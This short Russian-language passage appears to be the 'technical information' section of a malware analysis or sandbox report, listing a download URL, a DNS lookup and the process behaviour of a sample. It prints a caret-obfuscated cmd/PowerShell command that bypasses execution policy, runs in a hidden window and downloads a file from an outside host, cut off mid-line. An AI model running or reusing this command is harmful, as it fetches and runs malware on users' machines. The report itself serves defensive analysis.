Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^eR^SHEl^L^.e^xe -^e^x^e^C^u^ti^On^Polic^Y BypAS^s ^-NOpROfiLe -^WI^N^DoWSTYlE H^IDdeN ^(^nE^w-OBjEcT^ sy^sTEM.NET.^WEbClI^Ent^).^DownLoadFil^e(^'http://www.zoerpoled.top/read....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "Pow^eR^SHEl^L^.e^xe -^e^x^e^C^u^ti^On^Polic^Y BypAS^s ^-NOpROfiLe -^WI^N^DoWSTYlE H^IDdeN ^(^nE^w-OBjEcT^ sy^sTEM.NET.^WEbClI^Ent^).^DownLoadFil^e(^'http://www.zoerpoled.top/read....' (со скрытым окном)